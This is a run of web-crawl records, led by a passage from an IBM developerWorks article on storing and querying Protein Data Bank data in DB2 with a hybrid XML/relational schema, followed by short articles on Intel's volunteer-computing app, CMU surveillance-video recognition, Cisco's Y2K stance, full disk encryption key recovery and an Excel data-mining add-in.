GB each; 7,200 rpm), organized as a single logical volume (RAID 5) using a hardware controller. Database design recommendations for PDB This section describes a set of database design recommendations that lead to simple and efficient database support for storing and analyzing PDB data. These recommendations address the database schema, the choice between XML and relational storage, definition of indexes, and physical data organization with partitioning and clustering options. Hybrid XML/Relational storage PDBML documents currently contain up to 177 categories of information, most of them optional. The large number of optional PDBML elements allow the documents to be very flexible and highly variable. A fully relational database schema would require hundreds of tables to represent PDBML. Such a relational database schema for the PDB was developed in 2005 and is shown in Figure 2. With more than 400 tables and more than 3,000 columns, the complexity of this schema is overwhelming. It is extremely difficult to understand and query such a database schema because a single PDB entry is broken up and scattered over hundreds of tables, making it hard for users to know which information resides in which table. Therefore, keeping most of the PDBML information in its original XML format and storing it in a single XML column results in a much simpler database design and retains the data in a format that users naturally understand. Figure 2. Diagram of a fully relational database schema for PDBML One notable exception to the high variability of the PDBML data is the atom coordinates and their related labels, which follow a flat and regular structure repeated for every atom in a molecule, as illustrated in Listing 2. Since proteins commonly consist of thousands or tens of thousands of atoms, atom coordinates often represent 90 percent or more of a PDBML document. Listing 2. Atom coordinates in a PDBML document <PDBx:atom_siteCategory> <PDBx:atom_site id="1"> <PDBx:B_iso_or_equiv>37.41</PDBx:B_iso_or_equiv> <PDBx:Cartn_x>1.039</PDBx:Cartn_x> <PDBx:Cartn_y>16.834</PDBx:Cartn_y> <PDBx:Cartn_z>18.876</PDBx:Cartn_z> <PDBx:auth_asym_id>A</PDBx:auth_asym_id> <PDBx:auth_atom_id>N</PDBx:auth_atom_id> <PDBx:auth_comp_id>ASN</PDBx:auth_comp_id> <PDBx:auth_seq_id>1</PDBx:auth_seq_id> <PDBx:group_PDB>ATOM</PDBx:group_PDB> <PDBx:label_alt_id xsi:nil="true" /> <PDBx:label_asym_id>A</PDBx:label_asym_id> <PDBx:label_atom_id>N</PDBx:label_atom_id> <PDBx:label_comp_id>ASN</PDBx:label_comp_id> <PDBx:label_entity_id>1</PDBx:label_entity_id> <PDBx:label_seq_id>1</PDBx:label_seq_id> <PDBx:occupancy>1.00</PDBx:occupancy> <PDBx:pdbx_PDB_model_num>1</PDBx:pdbx_PDB_model_num> <PDBx:type_symbol>N</PDBx:type_symbol> </PDBx:atom_site> <PDBx:atom_site id="2"> <PDBx:B_iso_or_equiv>36.15</PDBx:B_iso_or_equiv> <PDBx:Cartn_x>-0.213</PDBx:Cartn_x> <PDBx:Cartn_y>16.205</PDBx:Cartn_y> <PDBx:Cartn_z>18.364</PDBx:Cartn_z> ... </PDBx:atom_site> <PDBx:atom_site id="3"> <PDBx:B_iso_or_equiv>33.97</PDBx:B_iso_or_equiv> <PDBx:Cartn_x>-0.549</PDBx:Cartn_x> <PDBx:Cartn_y>16.779</PDBx:Cartn_y> <PDBx:Cartn_z>16.986</PDBx:Cartn_z> ... </PDBx:atom_site> ... </PDBx:atom_siteCategory> The flat and regular structure of the atom information makes a perfect fit for traditional relational tables. In fact, the atom coordinates and labels are non-hierarchical data for which XML is not the best choice. Therefore, we decide on a hybrid database schema that stores the atom_site information in a relational table and the remainder of each PDBML document in an XML column, but <atom_siteCategory> removed from the document. This has several advantages: - The reduced PDBML documents are much smaller, which improves insert and load performance, as well as XML query performance. The XML parsing effort upon insert or load is reduced by approximately 90 percent. - The atom information takes less space in relational columns than in their verbose XML representation. - The atom data can be queried with traditional relational methods, which for non-hierarchical data is more efficient than XML navigation. - Since each atom is represented in a separated row, indices can help speed up the search for specific atoms within a given PDBML entry. The chosen database schema consists of two tables, shown in Listing 3. The first ( xmlrpdb.pdbxml) has one row for each PDB entry. This table has only two columns: - The primary key pdb_idholds the four-character PDB entry identifier from the XML attribute - The XML column pdbxml_fileholds the entire PDBML document except the The second table ( xmlrpdb.atom_site) contains one relational row for each atom coordinate (i.e., for each <atom_site> element in a PDBML document). pdb_id is the foreign key that links atom coordinates to the corresponding PDBML document in the Both tables are stored in table spaces with a 32-KB page size to maximize the performance analytical queries that read large numbers of rows. Listing 3. Hybrid XML/relational database schema for PDB in DB2 CREATE TABLE xmlrpdb.pdbxml ( pdb_id CHAR(4) NOT NULL, pdbxml_file XML NOT NULL, PRIMARY KEY (PDB_ID)) IN ts_data32k INDEX IN ts_index32k; CREATE TABLE xmlrpdb.atom_site ( pdb_id CHAR(4) NOT NULL, atom_site_id INTEGER NOT NULL, auth_asym_id VARCHAR(10) WITH DEFAULT NULL, auth_atom_id VARCHAR(20) NOT NULL, auth_comp_id VARCHAR(3) NOT NULL, auth_seq_id VARCHAR(20) NOT NULL, b_iso_or_equiv DECIMAL(7,3) NOT NULL, b_iso_or_equiv_esd DECIMAL(7,3) WITH DEFAULT NULL, cartn_x DECIMAL(7,3) NOT NULL, cartn_x_esd DECIMAL(7,3) WITH DEFAULT NULL, cartn_y DECIMAL(7,3) NOT NULL, cartn_y_esd DECIMAL(7,3) WITH DEFAULT NULL, cartn_z DECIMAL(7,3) NOT NULL, cartn_z_esd DECIMAL(7,3) WITH DEFAULT NULL, group_pdb VARCHAR(10) NOT NULL, label_alt_id VARCHAR(10) WITH DEFAULT NULL, label_asym_id VARCHAR(10) WITH DEFAULT NULL, label_atom_id VARCHAR(20) WITH DEFAULT NULL, label_comp_id VARCHAR(10) NOT NULL, label_entity_id SMALLINT NOT NULL, label_seq_id SMALLINT WITH DEFAULT NULL, occupancy DECIMAL(7,3) NOT NULL, occupancy_esd DECIMAL(7,3) WITH DEFAULT NULL, pdbx_pdb_atom_name VARCHAR(10) WITH DEFAULT NULL, pdbx_pdb_ins_code VARCHAR(10) WITH DEFAULT NULL, pdbx_PDB_model_num SMALLINT NOT NULL, type_symbol VARCHAR(10) WITH DEFAULT NULL, PRIMARY KEY (pdb_id, atom_site_id), FOREIGN KEY (pdb_id) REFERENCES xmlrpdb.pdbxml(pdb_id), CONSTRAINT group_chk CHECK (group_PDB in ('ATOM', 'HETATM')) ) IN ts_atom_data_32k INDEX IN ts_atom_index32k; CHECK constraints can be defined on the pdbxml table to ensure that the four-character PDB identifier conforms to the PDB standard. The first character must be a number between 1 and 9, and the next three characters must be a number between 0 and 9 or an uppercase character between A and Z (see Listing 4). CHECK constraints to ALTER TABLE xmlrpdb.pdbxml ADD CHECK (SUBSTR(pdb_id, 1, 1) BETWEEN '1' AND '9') ADD CHECK ((SUBSTR(pdb_id, 2, 1) BETWEEN '0' AND '9') OR (SUBSTR(pdb_id, 2, 1) BETWEEN 'A' AND 'Z')) ADD CHECK ((SUBSTR(pdb_id, 3, 1) BETWEEN '0' AND '9') OR (SUBSTR(pdb_id, 3, 1) BETWEEN 'A' AND 'Z')) ADD CHECK ((SUBSTR(pdb_id, 4, 1) BETWEEN '0' AND '9') OR (SUBSTR(pdb_id, 4, 1) BETWEEN 'A' AND 'Z')); Populating the hybrid database schema The conceptual process of inserting a PDBML document into our hybrid database schema is illustrated in Figure 3. The data needs to be extracted and removed from the XML document, and inserted into atom_site table (blue). The reduced document itself is inserted into the We call this process atom site separation. Figure 3. Hybrid storage of a PDBML document with Due to high data volume, the atom site separation (the population of the hybrid database schema) needs to have high performance. Hence, costly XML parsing should be reduced as much as possible. Revisiting the atom coordinates in XML format in Listing 2, we find that 94.5 percent of the characters are markup, and only 5.5 percent of the characters are actual values. Hence, the ratio of markup to value is extremely high, which means that a lot of XML parsing may be required to extract a comparatively small amount of usable data. You will understand shortly how this consideration has affected our decision of how to populate the two tables. One option to populate the relational is to use INSERT statements with an XMLTABLE function. Such a statement can parse the entire PDBML document and extract the atom information to insert as relational rows. Additionally, an XQuery Update expression can delete the <atom_siteCategory> subtree from the each PDBML document inserted into the pdbxml table. Such an XQuery Update expression can also be part of an INSERT statement so that the <atom_siteCategory> is removed before writing it into the XML column, rather than performing a separate step after the Another option is to use a special-purpose preprocessor outside the database to extract the atom data into a relational flat file and remove it from each PDBML document. Such a preprocessor was implemented in C++, and it has the following benefits: - It can add desirable annotations to the data, such as information from sequence and structure alignments or application-dependent geometric transformations like rotations or translations of atomic coordinates. - It can be implemented without using a general-purpose XML parser. Instead, it is designed and optimized for the specific file structure of PDBML documents. It exploits special knowledge about the flat structure of the atom data, the existence of newline characters between elements, and other characteristics. As a result, the specialized preprocessor is at least 10 times faster than any solution with XML parsing. Preprocessing the data set of 6,029 gzipped PDBML documents (i.e., 83 GB unzipped) and loading the prepared data into the atom_site table took only 1 hour and 44 minutes. The preprocessor is available for download (see Download). Considering the data volume in the PDB archive as well as its rapid growth, it is useful to compress the data in DB2. This reduces the storage consumption and improves performance. Although compression and decompression in DB2 consumes some additional CPU cycles, compression also reduces the number of physical I/O operations necessary to read a certain amount of data from disk. Furthermore, compressed pages of a DB2 table space remain compressed in the DB2 buffer pool in main memory. As a result, compression allows more data to be in memory than without compression, which increases the buffer-pool hit ratio and makes higher utilization of the available memory. We found that the I/O and memory benefits of compression outweigh the additional CPU cost and lead to overall higher performance. The following commands in Listing 5 were used to compress both tables. Listing 5. Enabling compression and REORG tables ALTER TABLE xmlrpdb.pdbxml COMPRESS YES; REORG TABLE xmlrpdb.pdbxml LONGLOBDATA RESETDICTIONARY; ALTER TABLE xmlrpdb.atom_site COMPRESS YES; REORG TABLE xmlrpdb.atom_site LONGLOBDATA RESETDICTIONARY; The reduction in space consumption is summarized in Table 1. After compression, the information contained in the 6,029 PDBML documents can be stored in 67.4 percent fewer pages (i.e., three times less space than without compression). Table 1. Space savings achieved by compression |Before compression||After compression||Savings| |xmlrpdb.pdbxml||176,256 pages||44,736 pages||74.6 percent| |xmlrpdb.atom_site||264,960 pages||99,264 pages||62.5 percent| |Total||441,216 pages||144,000 pages||67.4 percent| With a page size of 32 KB, the final storage of 144,000 pages is equivalent to 4.4 GB, which is only 5.3 percent of the original raw data volume of 83 GB. If we extrapolate this ratio to the total current size of the PDB archive, we find that the 0.75 TB of PDB information would be stored in DB2 using only approximately 40.7 GB of space, plus some space for indices. This tremendous saving of storage stems from two factors. First, the high ratio of markup to value in the atom information is eliminated by converting the atom coordinates to relation format in the preprocessing step. Second, DB2 compression shrinks the remaining XML and relational data by a factor of 3. Despite the significant reduction in space consumption, the PDB data volume continues to grow fast. Also, the response time of complex analytical queries can be reduced by spreading the data across multiple database partitions, such that all partitions work on their assigned data in parallel. These database partitions can reside on the same machine to exploit all the CPU power of a multi-core system, or they can be spread across multiple machines in a shared-nothing configuration. The DB2 Database Partitioning Feature (DPF) is available through IBM InfoSphere® Warehouse, a software package that contains DB2 with advanced features, as well as additional design, reporting, and database management tools. Using the DPF, we recommend to distribute the data in the pdbxml table and atom_site table across the database partitions by hashing on the values of the This is achieved by adding the clause HASH(pdb_id) to the respective CREATE TABLE statement. The large number of distinct values in the pdb_id column ensures a relatively even distribution of rows over the database partitions. Distributing both tables by hashing on their join key ( ensures that all atom rows for a given PDBML document are stored in the same database partition as the PDBML document itself. This collocation implies that joins between the two tables can always be evaluated within each of the database partitions and never require data to be shipped across partitions. Range partitioning (also known as table partitioning) enables you to partition the data in a table according to the value in a specified column, such that rows with the same value will reside in the same partition. The concept of range partitioning is orthogonal to the database partitioning. If database partitioning and range partitioning are used together, the rows in a table are first hashed across the database partitions and then range-partitioned within each database partition. Range partitioning can serve multiple purposes. One purpose is easier roll-in and roll-out of new and old data, respectively. Another purpose is to improve performance based on partition elimination when the DB2 query optimizer determines that only a subset of the partitions need to be examined to answer as particular query. For the PDB, range partitioning was deployed to benefit from partition elimination, rather than to simplify roll-in and roll-out of data. We decided to range-partition the table by the pdbx_PDB_model_num column for the following reason: Remember that the tertiary structure of a protein can be experimentally determined with a method called NMR, which produces multiple tertiary structures for the same protein. These variations are called models and are numbered by the field pdbx_PDB_model_num. A value of pdbx_PDB_model_num = 1 identifies the first (default) model of a protein. The additional variations are the non-default models of the same protein and have pdbx_PDB_model_num >= 2. Proteins that have been structurally determined by X-ray Diffraction have only one model with pdbx_PDB_model_num = 1. Listing 6 shows the extended definition of the atom_site table with range partitioning. All atom coordinates that belong to the first model pdbx_PDB_model_num = 1) are stored in one partition, whereas any variations ( pdbx_PDB_model_num >= 2) are stored in another. Although only about 16 percent of all proteins currently in the PDB have variations produced by NMR, the number of their variations is so large that both partitions have roughly the same number of records. Listing 6. Table definition with range partitioning CREATE TABLE xmlrpdb.atom_site ( pdb_id CHAR(4) NOT NULL, ... pdbx_PDB_model_num SMALLINT NOT NULL, type_symbol VARCHAR(10) WITH DEFAULT NULL, PRIMARY KEY (pdb_id, atom_site_id), FOREIGN KEY (pdb_id) REFERENCES xmlrpdb.pdbxml(pdb_id), CONSTRAINT group_chk CHECK (group_PDB in ('ATOM', 'HETATM')) ) -- IN ts_atom_data_32k INDEX IN ts_atom_index32k PARTITION BY RANGE (pdbx_PDB_model_num) ( PARTITION DEF_MODELS STARTING (1) ENDING (1) IN TS_ATOM_DATA1_32K, PARTITION NON_DEF_MODELS STARTING (2) ENDING (MAXVALUE) IN TS_ATOM_DATA2_32K ); We have chosen this range-partitioning scheme because many PDB queries typically differentiate between default and non-default protein models, and can therefore benefit from the partitioning. For example, a query that analyzes all or most of the default models only needs to scan the partition DEF_MODELS, which reduces the required I/O by half. In addition to range-partitioning, multi-dimensional clustering (MDC) can be used to cluster the rows in a table based on one or more columns. Rows that have the same value in the clustering columns are physically stored together in the same storage cell. This can greatly improve the performance of queries that constrain and select data along one or multiple clustering dimensions. Like the DPF, MDC is also available through IBM InfoSphere Warehouse. The choice of clustering columns needs to be based on the expected query workload so the clustering supports the most common and most critical queries. For example, many PDB queries might search the atom data based on the amino acid involved. Therefore, it can be beneficial to cluster the atom_site table based on the column label_comp_id, which, in most documents, contains the three-letter code for the amino acid. To achieve this clustering, add the following clause to the second CREATE TABLE statement in Another example is to cluster the group_PDB column. We have evaluated this clustering for several sample queries that restrict their search to a single group_PDB value (i.e., "HETATOM") and found that it can improve query performance fourfold. PDB queries and performance In this section, we discuss two sample queries to demonstrate: - The ease with which even complex analysis of PDB data can be carried out. - The benefit of the database design decisions described in the previous sections. The query in Listing 7 selects the PDB identifier, the resolution, and the description from all PDB entries where the experimental method "X-RAY DIFFRACTION" and the resolution ls_d_res_high) is less than 2.5. The resolution is expressed in Ångstrøm (1Å = 0.1 nanometer) and serves as a quality metric for the analysis of the atom structures. Structures with a resolution less than 2Å are high-resolution structures (i.e., the locations of their atoms could be determined very accurately). Structures with a resolution greater than 3Å are less accurate and usually ignored. Listing 7. Query the top 10 records with the best X-ray resolution SELECT pdb_id, x.resolution, x.pdbx_descriptor FROM xmlrpdb.pdbxml, XMLTABLE ('$PDBXML_FILE/*:datablock/*:refineCategory/*:refine[ @pdbx_refine_id = "X-RAY DIFFRACTION" and *:ls_d_res_high <= 2.5 ]' COLUMNS resolution DEC(9,5) PATH '*:ls_d_res_high', pdbx_descriptor VARCHAR(2000) PATH '../../*:structCategory/*:struct/*:pdbx_descriptor' ) AS x -- WHERE -- upper(x.pdbx_descriptor) LIKE '%UNKNOWN%' or -- upper(x.pdbx_descriptor) LIKE '%UNCHARACTERIZED%' ORDER BY x.resolution FETCH FIRST 10 ROWS ONLY; The result of this query is shown in Listing 8. One of the benefits of using DB2 pureXML as opposed to custom code is that it's easy to modify SQL/XML queries to refine the search. For example, Listing 7 contains three comment lines with an additional clause. They can be used to further filter the descriptor to find those structures that are not or could not be characterized yet. Listing 8. Result produced by the query in Listing 7 PDB_ID RESOLUTION PDBX_DESCRIPTOR ------ ----------- ------------------------------------------------- 2VB1 0.65000 LYSOZYME C (E.C.126.96.36.199) 2B97 0.75000 Hydrophobin II 2OV0 0.75000 PROTEIN 2I16 0.81000 Aldose reductase (E.C.188.8.131.52) 2I17 0.81000 Aldose reductase (E.C.184.108.40.206) 2HS1 0.84000 HIV-1 Protease V32I mutant (EC 220.127.116.11) 2F01 0.85000 Streptavidin 2OL9 0.85000 SNQNNF peptide from human prion residues 170-175 2PF8 0.85000 Aldose reductase (E.C.18.104.22.168) 2P74 0.88000 Beta-lactamase CTX-M-9a (E.C.22.214.171.124) 10 record(s) selected. The predicates in the query in Listing 7 are weakly selective so that a full table scan of the table is required. Table 2 summarizes how the performance of this table scan query has benefited from two of our design decisions: atom site separation and compression. In our environment, this table scan was I/O-bound. DB2 compression mitigated the I/O bottleneck and reduced the query elapsed time by more than 40 percent (from 244 to 128 seconds). Extracting the atom site data into a separate relational table greatly reduced the size of pdbxml table, improving the query performance by almost 4 1/2 times, from 138 to 31 seconds. Table 2. Response times (without indices) of the query in Listing 7 |Atom site separation||Compression||Response time| Listing 9 shows another sample query, which determines how often different atoms — or ions — occur in different compounds. The WHERE clause restricts the search to so-called hetero atoms and only considers the first model of each protein. Listing 9. Analysis of hetero atom occurrences SELECT label_atom_id AS "Atom", COALESCE(label_comp_id, 'none') AS "Compound", COUNT(*) AS "Occurrences" FROM xmlrpdb.atom_site WHERE group_PDB = 'HETATM' AND pdbx_PDB_model_num = 1 GROUP BY label_atom_id, label_comp_id ORDER BY COUNT(*),label_comp_id DESC; A subset of the result rows is shown in Listing 10. The most frequently detected chemical compound is water (HOH) with oxygen (O) as one of its atoms. The reported number of hydrogens, denoted by H1 and H2 for HOH, is low because detecting hydrogens requires a very high resolution that is not always achieved. (Human) hemoglobin is a protein consisting of multiple molecules, and such a molecule can interact with a non-protein compound called heme. A heme (HEM) is a multi-atom, non-proteinaceous organic structure capable of positioning an iron (FE) ion in its center. This iron ion, on its hand, is critical for oxygen binding. The result in Listing 10 shows that iron occurs frequently together with heme compounds. Although this is a simple example, it demonstrates how efficient it has become to detect meaningful correlations in the PDB data and to gain better understanding of how proteins function and interact on a molecular level. Listing 10. Subset of the result produced by the query in Listing 9 Atom Compound Occurrences -------- -------------- ------------------------- O HOH 1571965 MG MG 7159 ... H1 HOH 1858 H2 HOH 1858 ZN ZN 1664 ... CL CL 1318 CA CA 1295 ... FE HEM 379 NA HEM 379 Table 3 shows how our database design choices for atom site separation, compression, range partitioning, and multi-dimensional clustering can provide excellent performance, even when no query-specific indexes exist. Table 3. Response times (without indices) of the query in Listing 9 |Atom site separation||Compression||Range partitioning||MDC||Response time| This article has described how to use pureXML and relational data management features in DB2 to efficiently store and query the Protein Data Bank (PDB). Based on the intrinsic characteristics of the protein data, we have designed an optimized hybrid database schema. For best performance and minimal space consumption, we recommend using database partitioning, range partitioning, compression, and multi-dimensional clustering. Additionally, a combination of XML indices and relational indexes can further improve query performance. The DB2-based PDB continues to be used for investigations, such as searching the entire PDB for certain protein interactions and to help explain unusual interactions on the structural level. The development of the DB2-based PDB was done in the Structural Bioinformatics research group of Maria Teresa Pisabarro, Biotechnology Center, Technical University Dresden, Germany. The project was financed by a scholarship from the foundation of SAP co-founder Klaus Tschira. Also, thanks to Henrik Loeser for his help with the work described in this article and the Berlin Institute of Medical Systems Biology (BIMSB) of the Max Delbrück Center (MDC) for Molecular Medicine Berlin-Buch, Germany, for providing the production server. |C++-preprocessor and a few DB2 sample queries||db2pdb_download.zip||965KB| - Visit PDB.org for more information about the Protein Data Bank and the XML format PDBML. - Learn more about the XML format PDBML. - For an introduction to PDB data, read "Understanding PDB Data: Looking at Structures." - Get the full XML document from which extracts are shown in Listings 1 and 2. - Gain comprehensive knowledge of DB2 pureXML with the DB2 pureXML Cookbook. - Read more about compression, partitioning, and clustering of XML data in the article "Enhance business insight and scalability of XML data with new DB2 9.7 pureXML features." - For more DB2 pureXML resources, explore the DB2 pureXML enablement wiki. - Read the Native XML Database blog to stay up to date on latest news and XML tips and tricks. - Learn about the IBM Academic Initiative. - Learn more about Information Management at the developerWorks Information Management zone. Find technical documentation, how-to articles, education, downloads, product information, and more. - Stay current with developerWorks technical events and webcasts. - Follow developerWorks on Twitter. Get products and technologies - Download DB2 Express-C for free. - Build your next development project with IBM trial software, available for download directly from developerWorks. - Participate in the discussion forum. - Check out the developerWorks blogs and get involved in the developerWorks community.
<urn:uuid:3862530b-ec35-491d-b221-2c1f21401620>
CC-MAIN-2017-04
http://www.ibm.com/developerworks/data/library/techarticle/dm-1109proteindatadb2purexml/index.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00166-ip-10-171-10-70.ec2.internal.warc.gz
en
0.828332
8,557
2.6875
3
Intel has developed a Facebook application that allows users to donate their spare processing power to help fight disease and combat climate change. By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. Using peer-to-peer computing, researchers break up complex computational tasks into pieces of work that can be farmed out to PCs. If hundreds or thousands of PCs participate, the combined computing power can be used over time to solve complex calculations, like the Seti programme used to search for signs of extraterrestrial life. Intel's Facebook peer-to-peer application, Progress Thru Processors, allows users to donate their PCs' unused processor power to research projects such as Rosetta@home, which uses the additional computing power to help find cures for cancer and other diseases such as HIV and Alzheimer's. Climateprediction.net is dedicated to increased understanding of global climate change by predicting the Earth's climate and testing the accuracy of climate models. Africa@home is currently focused on finding optimal strategies to combat malaria by studying simulation models of disease transmission and the potential impact of new anti-malarial drugs and vaccines. The application automatically directs a computer's idle processor power to fuel researchers' computational efforts, Intel said. The application will activate only when a PC's performance is not being fully used. When the participant's computer usage demands more processor performance, the application defers and sits idle until spare processing capabilities become available again. Intel said the application runs automatically as a background process on a PC and will not affect performance or any other tasks. Additionally, Progress Thru Processors does not require participants to leave their computers powered up unnecessarily. By keeping their PCs on only as they normally would, participants will still be contributing to life-changing research, according to Intel. Progress Thru Processors was developed in collaboration with the National Science Foundation-funded BOINC project at the University of California, Berkeley. Marketing and creative work for Progress Thru Processors was provided by noise, a New York-based marketing agency.
<urn:uuid:4207d353-bcb1-48c0-b2ec-15b4a21a3ae5>
CC-MAIN-2017-04
http://www.computerweekly.com/news/1280090356/Intel-develops-Facebook-app-to-fight-cancer-and-climate-change
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00074-ip-10-171-10-70.ec2.internal.warc.gz
en
0.923392
421
2.578125
3
Security guards who monitor surveillance cameras could one day be replaced by a computer program, thanks to the Mind's Eye program at Carnegie Mellon University (CMU). At CMU, researchers are working on software that can not only monitor surveillance video, but also predict what will happen next and prevent crimes before they occur, Phys.org reported. The system would sound an alarm upon detecting behavior considered suspicious. Details about the project, which is funded by the U.S. Army, were published this week in a paper called Using Ontologies in a Cognitive-Grounded System: Automatic Action Recognition in Video Surveillance [PDF]. Alessandro Oltramari, a postdoctoral researcher, and Christian Lebiere, both from the Department of Psychology at CMU, suggested that the system could be used in both military and civil environments. The system's cognitive engine identifies actions such as walk, run, carry, follow, pick up and chase, and micro-actions such as bend over, drag and stop. In addition to identifying what people are doing, the cognitive engine is also able to couple visual signals with background knowledge to draw conclusions. For instance, the algorithm “knows” that cars move, every car needs a driver to move, drivers are people located inside of cars, and if a car moves then a driver inside the car will move along with it. The system can understand things that may sound obvious to people, but can be troublesome for computers. Researchers said they plan to extend the functionality of the software to include more verbs and run tests on a larger video data set. Photo courtesy of Shutterstock.com
<urn:uuid:f3a51e2b-dc8d-4928-b6a4-7e646c0de751>
CC-MAIN-2017-04
http://www.govtech.com/Smart-Cameras-Predict-Human-Behavior.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00560-ip-10-171-10-70.ec2.internal.warc.gz
en
0.956375
331
3.046875
3
Full disk encryption software uses a symmetrical encryption algorithm to encrypt every block on a hard disk or other persistent storage media (e.g., flash drives, etc.). The idea is that even if the storage device is lost or stolen, none of the contents of the filesystem will be compromised. A key consideration with full disk encryption is generating and securing the encryption key. Normally a single, long, pseudo-random encryption key is used to encrypt the storage device. User keys are used to encrypt/decrypt the disk encryption key. User keys, in turn, may be: The most common approach to key management on personal computers (i.e., not servers where system startup typically must proceed unattended) is to prompt the user to enter a password prior to starting the PC's operating system. The password decrypts the user's key, which in turn decrypts the data key that encrypts/decrypts hard drive contents. Where pre-boot password authentication is used, the pre-boot password may be synchronized with the user's primary network login password -- usually an Active Directory password. This reduces the number of distinct passwords users must remember and type. If a user forgets his pre-boot password, he must go through an unlock process. Typically the full disk encryption software presents the user with a challenge string, which the user communicates to an IT support person with access to a key recovery application. The support person enters the challenge string and reads back a response, which the user must type. A correct response will unlock the user's PC, at which time the user should choose a new password (and remember it this time!). Hitachi ID Password Manager enables users whose PC is protected with a disk encryption software and who have forgotten the password they type to unlock their computer to reactivate their PC. The process for key recovery is as follows:
<urn:uuid:60eeb7dd-0a69-4f75-93d5-ebd2687cfdae>
CC-MAIN-2017-04
http://hitachi-id.com/resource/concepts/full-disk-encryption.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00312-ip-10-171-10-70.ec2.internal.warc.gz
en
0.908844
378
2.890625
3
Many electronic systems rely upon computer codes or embedded microprocessors that are unable to process the change in date from 1999 to 2000 -- the so-called Y2K computer problem. Industry and governments around the world have been working together for years to minimize the impact of this problem. There are four principal challenges resulting from the Y2K "millennium bug": - Ensuring that all products are Year 2000 compliant; - Minimizing disruption to internal information systems and processes; - Minimizing disruption in delivery of services and assistance to publics; and - Minimizing disruption to economic growth by limiting exposure and resources devoted to Y2K-related legal liability action. According the U.S. Department of Commerce, American businesses and the government have spent over $100 billion preparing for the 2000 date change already. Cisco Systems supported bipartisan efforts in Congress to encourage information disclosure and minimize frivolous lawsuits. At the same time Cisco has taken steps to contractually address publics' needs while also presenting a viable plan to correct any problems. Advanced planning and preparation by the private and public sectors should allow for smooth management of the process. For decades, computer programmers routinely used two digits rather than four to refer to years (i.e. 19__) to save scarce memory space. When these programs advance from 12/31/99 to 1/1/00, they may mistakenly read the year "00" as 1900 rather than 2000. This problem could result in administrative errors, machinery malfunctions or even computer crashes. Although this year 2000 ("Y2K") problem is generally software related, it also exists in many hardware components where microprocessor chips and other integrated circuits store and process data. Cisco Systems has taken a number of actions with respect to its own Y2K readiness that are fully discussed. In addition, Cisco supported bipartisan Congressional efforts to encourage information disclosure and minimize the incidence and impact of frivolous lawsuits: First, in 1998 Cisco endorsed the Year 2000 Information and Readiness Disclosure Act (S.2392) - a bill to encourage companies to share information on Y2K by limiting liability for such disclosures. This year Cisco supported the Year 2000 Readiness and Responsibility Act (H.R. 775) - a bill to encourage remediation rather than litigation of Y2K problems. Both measures were passed by Congress and signed into law. Cisco worked with its partners and associations such as the Information Technology Industry Council to encourage fair and sensible legislation. Internally, Cisco appointed an executive steering committee to oversee the company's own compliance and remediation efforts. American businesses and the government have spent over $100 billion preparing for the 2000 date change. ( U.S. Dept of Commerce Y2K Cost Report, Nov. 1999 ). Y2K spending in the U.S. & 11 European countries doubled from $256 billion in April 1998 to $494 billion by November. (Cap Gemini America tracking poll 11/1998). Nearly 60 percent of all available IT labor resources have been focused on Year 2000 activity. ( Cap Gemini America tracking poll, 11/1998 ). 56% of large corporations expect 100% of their critical systems to be compliant by year's end as of 9/1999, up from 48% in 8/1999. 38% expect that between 76%-99% of their systems will be compliant. ( Cap Gemini America tracking poll, 9/22/1999 ). It costs between $450 and $600 to fix each Y2K computer program (Gartner Group). Companies spent 29% of their computer budgets on Y2K in 1998; in 1999 costs are predicted to rise to 44% (Gartner Group). The cost of addressing Y2K issues will total between $150-$225 billion in the US, and $300 to $600 billion worldwide (Gartner Group). Useful Y2K Links President's Council on the Year 2000 Conversion U.S. Federal Government Gateway for Year 2000 Information Directories Y2K Information for Children sites include Y2Kids.net and GSA's Y2K for Kids. U.S. Senate Special Committee on the Year 2000 Problem. U.S. House of Representatives Y2K Subcommittee. U.S. Small Business Administration's Year 2000 Web Site. U.S. Government Accounting Office Reports & Publications. Government Executive Magazine's Year 2000 Managers' Toolbox. International Year 2000 Conference on IT.
<urn:uuid:683ad9ea-da6c-41b5-af8e-079618d2a778>
CC-MAIN-2017-04
http://www.cisco.com/c/en/us/about/government-affairs/archives/y2k.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281419.3/warc/CC-MAIN-20170116095121-00000-ip-10-171-10-70.ec2.internal.warc.gz
en
0.9117
920
3.046875
3
Data Mining and Predictive Analytics Software For Microsoft Excel: Page 2 Data Mining and Predictive Analytics in Four Steps The tool allows you to mine your own data to find patterns using only four steps — prepare, analyze, predict and report. It is also designed to automate the process of algorithm selection, parameter tuning and reporting. Each step is easily accessed using a separate tab in your 11Ants Model Builder Excel Ribbon. Prepare: By selecting data columns in your spreadsheet, you choose one column as the target column and others as the input. For example, for sales data you might use season, date and volume as the input and the revenues column as the target. The 11Ants Model Builder will analyze the relationships between the input and the target. The data is then partitioned — or split — into two sets: training and test. Here users familiar with Excel will have little problem with getting the data prepared. Options in Model Builder allow you to change the target column and adjust the weight between test and train size. Once you have selected options, you select "Prepare Sheets" and you will find your Excel worksheet is now three worksheets: the original plus one for training data and test data. As this process runs, 11Ants Model Builder is analyzing the data for relationships and generates continuous models looking for the best one. The quality score changes based on the amount and quality of data being analyzed. You can view quick info about the project, including estimated Input influences, Top 10 and improvement curve. As the process runs, you can watch the quality score — the higher the percentage, the more patterns found in the data. This information is also available through the Manage Tab in the Excel Ribbon. Predict: When ready, you can build your predictive model using the test spreadsheet. By choosing "Predict" from the ribbon, you can choose your prediction settings and a new sheet will be generated to see how the model works on the test data. Using your test data worksheet, you can choose your model, confirm your input data type, choose a column to output the results, assign a confidence (hi/med/low) to each prediction, and also decide the type of prediction to be reported and compare predictions against known values. When you click "Predict Now," a new worksheet for the prediction statistics is generated.
<urn:uuid:956848b2-1315-4f5e-9866-0376089f08a3>
CC-MAIN-2017-04
http://www.enterpriseappstoday.com/business-intelligence/data-mining-and-predictive-analytics-software-for-microsoft-excel-2.html
null
